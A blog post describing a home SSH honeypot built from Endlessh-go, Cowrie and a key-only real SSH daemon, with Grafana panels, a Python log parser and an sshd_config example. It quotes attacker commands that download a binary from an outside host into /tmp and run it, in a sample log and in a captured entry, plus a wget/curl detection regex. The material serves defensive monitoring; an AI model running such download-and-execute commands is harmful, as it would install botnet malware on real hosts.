Okay, before I start talking about my honeypot, I want to give a huge shoutout to the creator of Endlessh-go, Shizun Ge, and to the Cowrie team. Without them, this project would not have been possible.
In this post I want to walk through my simple honeypot design, the full setup, and some things I noticed while hosting it. But first, the name "L4berint": I chose it because once you try to connect, you lose every point of orientation. I took the word Labyrinth and swapped its second letter, the a, for a 4, exactly like "b4sh" :).
The Full Setup Overview
To put it briefly: the design is simple, but there is a lot of thinking behind it. All of these ports are open on my device:
    λ [~] nmap L4berint.honey
    Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-19 22:41 +0100
    Nmap scan report for raspberrypi (L4berint.honey)
    Host is up (0.015s latency).

    PORT      STATE
    22/tcp    open
    2222/tcp  open
    22222/tcp open

    Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
The first port, 22, has Endlessh-go behind it. Endlessh-go is a nice Go implementation of Endlessh, a fake SSH service that doesn't just soak up the brute-force noise hitting your server, it traps the attacker in a jail of his own making. In short: when an attacker connects, Endlessh abuses a corner of the SSH protocol. RFC 4253 allows a server to send arbitrary text lines before its real "SSH-2.0-..." identification string (each line CRLF-terminated and not starting with "SSH-"), and a client has to read and ignore them. Endlessh sends those lines endlessly and very slowly, so the real handshake never begins and the client sits in the connection until its own timeout fires or someone kills it. Until then, the attacker is stuck.
The developer of Endlessh-go was also smart enough to expose metrics for everything that comes in and to ship a Grafana dashboard for them, which he designed for us, so you can watch the trapped connections pile up. A very nice tool for wasting automated scanners' time and absorbing the "noise" from annoying people.
Now look at it from the perspective of someone running one of these bullshit SSH scanners who just sat stuck on port 22 for a while: you're pissed and want to hit my server even harder, so port 2222 is where you end up next.
Port 2222 — Cowrie
Port 2222... is also an interesting service, because behind it there is another SSH service. Let me introduce you to Cowrie: a great fake SSH service that emulates a Linux system and accepts pretty much any username and password you try to log in with. But instead of explaining much, let me just show you how it looks:
    λ [~] ssh root@L4berint.honey -p 2222
    ** WARNING: connection is not using a post-quantum key exchange algorithm.
    ** This session may be vulnerable to "store now, decrypt later" attacks.
    ** The server may need to be upgraded. See https://openssh.com/pq.html
    root@L4berint.honey's password:

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    root@HomeServer:~# ls
    root@HomeServer:~# whoami
    root
    root@HomeServer:~# ls /home
    phil
    root@HomeServer:~# ls /home/phil/
    root@HomeServer:~# ping google.com
    PING google.com (29.89.32.244) 56(84) bytes of data.
    64 bytes from google.com (29.89.32.244): icmp_seq=1 ttl=50 time=42.6 ms
    64 bytes from google.com (29.89.32.244): icmp_seq=2 ttl=50 time=47.2 ms
    64 bytes from google.com (29.89.32.244): icmp_seq=3 ttl=50 time=40.8 ms
    ^C
    --- google.com ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 907ms
    rtt min/avg/max/mdev = 48.264/50.352/52.441/2.100 ms
    root@HomeServer:~# curl google.com
    <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
    <TITLE>301 Moved</TITLE></HEAD><BODY>
    <H1>301 Moved</H1>
    The document has moved
    <A HREF="http://www.google.com/">here</A>.
    </BODY></HTML>
    root@HomeServer:~#
A few interesting things are going on here. First, I didn't set up any of these directories myself, and this isn't a Docker container or a VM either: Cowrie is a Python application that emulates the whole thing, shell, filesystem and network commands included (which is why the ping replies come from a made-up address and the per-packet times don't even match the summary line). Every session that connects to it gets logged, so you can watch attackers while they think they are getting a shell on your server.
I also hooked the logs up to their own Grafana dashboard with three panels: logins, commands, and dangerous commands. Logins shows every login that happened, with the exact time, the IP address, and the username and password that were used. Commands shows the IP address and the command that was executed in the fake shell. Dangerous commands uses a regex to filter for wget, curl, http, and https, and prints the exact date and time together with the command and the IP address.
Comparing with the login I simulated above, we can see:
    ┌───────────────────────────────────────────────┐ ┌──────────────────────────────────┐
    │ Logins:                                       │ │ Commands:                        │
    │ 19.02.26 22:04:02 | 192.168.0.193: root|toor  │ │ 192.168.0.193: ls                │
    │ ...                                           │ │ 192.168.0.193: whoami            │
    │                                               │ │ 192.168.0.193: ls /home          │
    │                                               │ │ 192.168.0.193: ls /home/phil/    │
    │                                               │ │ 192.168.0.193: ping google.com   │
    │                                               │ │ 192.168.0.193: curl google.com   │
    └───────────────────────────────────────────────┘ └──────────────────────────────────┘
    ┌────────────────────────────────────────────────────────────────────────────────────┐
    │ Dangerous Commands:                                                                │
    │ 19.02.26 22:06:12 | 192.168.0.193 : curl google.com                                │
    └────────────────────────────────────────────────────────────────────────────────────┘
A very nice dashboard for seeing everyone who has fallen into your trap and tried to "hack" into your device. For further analysis, you can also see the important commands, where someone tried to download their C2 client or some shady botnet software.
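If you would rather build those three panels without Grafana, or want to pull the payload URLs out of the dangerous commands for blocking, the logic is small. This is an added example, not part of the L4berint setup and not Cowrie's code: the event and field names (eventid, timestamp, src_ip, username, password, input) follow Cowrie's JSON log output (cowrie.json) as I know it, so check them against your own log, and the sample lines are constructed for the example with documentation IP ranges, not captured traffic.

```python
"""Turn Cowrie-style JSON log lines into the three dashboard panels plus a list of payload URLs.

Added example, not Cowrie's code and not the author's dashboard queries. Field names follow
Cowrie's JSON log output as I know it; the SAMPLE_LOG lines are constructed, not captured.
"""
import json
import re
from datetime import datetime, timedelta, timezone

# Same filter as the Grafana panel: wget, curl, or any http(s) URL anywhere in the command.
DANGEROUS = re.compile(r"\b(?:wget|curl)\b|https?://", re.IGNORECASE)
# Pull download URLs out of a command so the hosting sites can be tracked or blocked.
URL = re.compile(r"https?://[^\s\"';|&]+")
# Cowrie stamps events in UTC; the dashboard on the page shows +0100, so render in that zone.
LOCAL_TZ = timezone(timedelta(hours=1))

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","timestamp":"2026-02-19T21:04:01.000000Z","src_ip":"192.168.0.193","session":"a1b2c3d4e5f6"}
{"eventid":"cowrie.login.success","timestamp":"2026-02-19T21:04:02.000000Z","src_ip":"192.168.0.193","session":"a1b2c3d4e5f6","username":"root","password":"toor"}
{"eventid":"cowrie.command.input","timestamp":"2026-02-19T21:04:10.000000Z","src_ip":"192.168.0.193","session":"a1b2c3d4e5f6","input":"ls"}
{"eventid":"cowrie.command.input","timestamp":"2026-02-19T21:06:12.000000Z","src_ip":"192.168.0.193","session":"a1b2c3d4e5f6","input":"curl google.com"}
{"eventid":"cowrie.login.failed","timestamp":"2026-02-19T21:30:00.000000Z","src_ip":"203.0.113.7","session":"0f0f0f0f0f0f","username":"admin","password":"admin123"}
{"eventid":"cowrie.login.success","timestamp":"2026-02-19T21:30:01.000000Z","src_ip":"203.0.113.7","session":"0f0f0f0f0f0f","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","timestamp":"2026-02-19T21:30:05.000000Z","src_ip":"203.0.113.7","session":"0f0f0f0f0f0f","input":"nohup $SHELL -c \\"wget http://198.51.100.9:6352/linux -O /tmp/x; chmod +x /tmp/x; /tmp/x\\""}
this line is torn because the log was rotated mid-write
"""


def parse_events(text: str) -> list:
    """One JSON object per line; skip torn or empty lines instead of aborting the whole run."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def fmt_ts(ts: str, tz=LOCAL_TZ) -> str:
    """'2026-02-19T21:04:02.000000Z' -> '19.02.26 22:04:02' (the dashboard's format and zone)."""
    dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return dt.astimezone(tz).strftime("%d.%m.%y %H:%M:%S")


def build_panels(events: list) -> dict:
    """Logins, commands and dangerous commands, in the row format the dashboard on the page uses."""
    panels = {"logins": [], "commands": [], "dangerous": []}
    for ev in events:
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.success", "cowrie.login.failed"):
            row = f"{fmt_ts(ev['timestamp'])} | {ev['src_ip']}: {ev['username']}|{ev['password']}"
            if eid == "cowrie.login.failed":
                row += " (failed)"
            panels["logins"].append(row)
        elif eid == "cowrie.command.input":
            cmd = ev["input"]
            panels["commands"].append(f"{ev['src_ip']}: {cmd}")
            if DANGEROUS.search(cmd):
                panels["dangerous"].append(f"{fmt_ts(ev['timestamp'])} | {ev['src_ip']} : {cmd}")
    return panels


def payload_urls(events: list) -> list:
    """Every URL seen in any command, deduplicated and sorted: the download sites worth watching."""
    found = set()
    for ev in events:
        if ev.get("eventid") == "cowrie.command.input":
            found.update(URL.findall(ev["input"]))
    return sorted(found)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for name, rows in build_panels(evs).items():
        print(f"== {name} ==")
        for row in rows:
            print(row)
    print("== payload URLs ==")
    for u in payload_urls(evs):
        print(u)
```

Two practical notes: the regex is deliberately loose (a plain `curl google.com` lands in the dangerous panel too, exactly as on the dashboard above), and the URLs you extract belong to whoever is running the campaign, so fetch samples only from an isolated machine, never from the home network the honeypot sits on.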
Port 22222 — The Real SSH
The last port is the only remaining option for the hacker to unleash their hate on my server. There isn't much to explain about 22222: it's just the normal SSH service. But if you think you can simply connect to it, you fail. After all that work getting through every port, so close to the finish line, my SSH daemon is configured to accept key-based authentication only, with passwords switched off, so no damage can be done there.
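For reference, this is what "key only" looks like in sshd_config. It is an added example of the settings I would use for such a host, not the author's actual file; the weak settings are shown commented out next to the ones that replace them.

```text
# /etc/ssh/sshd_config for the real service on 22222
# (added example, not the author's actual configuration)
Port 22222

# What you do NOT want on a host that is deliberately scanned all day:
#   PasswordAuthentication yes
#   KbdInteractiveAuthentication yes
#   PermitRootLogin yes

# Key only. Every other method is switched off, and AuthenticationMethods
# restricts logins to public keys even if some later Include flips
# PasswordAuthentication back on.
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no     # ChallengeResponseAuthentication on OpenSSH < 8.7
PermitEmptyPasswords no
AuthenticationMethods publickey
PermitRootLogin prohibit-password   # or "no", and log in as an unprivileged user

# Cheap extra friction for the scanners that do find 22222
MaxAuthTries 3
LoginGraceTime 20
```

Before restarting, `sshd -t` checks the syntax and `sshd -T | grep -iE 'passwordauthentication|kbdinteractive|authenticationmethods'` shows the values that are actually in effect after all includes. The test that matters is the negative one from another machine: `ssh -p 22222 -o PubkeyAuthentication=no -o PreferredAuthentications=password user@host` must end in "Permission denied (publickey)." without ever asking for a password. Keep in mind that Endlessh on port 22 protects nothing on 22222; the scanners in the logs above do find the other ports, and this configuration is the only thing standing between them and a real shell.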
That is my final design of my honeypot.
Some interesting things I found out
Let me keep this short. When you look at all this information, you really understand what people mean when they say the internet is a dangerous place. For example, even while I'm writing this text, someone has been probing Phil's home directory for the past half hour, trying to "hack" my device:
19.02.26 22:37:00 | 192.144.170.161 : nohup $SHELL -c "curl http://60.205.248.70:6352/linux -o /tmp/qJMU8...
I've been seeing this exact same attempt regularly for about half a year now, which only reinforces my point: how is it possible that something can try to "hack" a random server for half a year, with the same obvious tactic, and nothing happens? This is 100% a bot, so why isn't there any legal action against this threat...
So where the great internet fails to keep you safe, you have to step in yourself, and maybe think about setting up your own "L4berint" honeypot. Mine runs perfectly on my Raspberry Pi with zero issues. Come check it out yourself at 77.22.84.202, and give me your opinion on the honeypot, maybe by logging into the fake SSH service and leaving some commands in Phil's home directory...
Thanks for reading my article, and good luck in the wild west of the internet.
- b4sh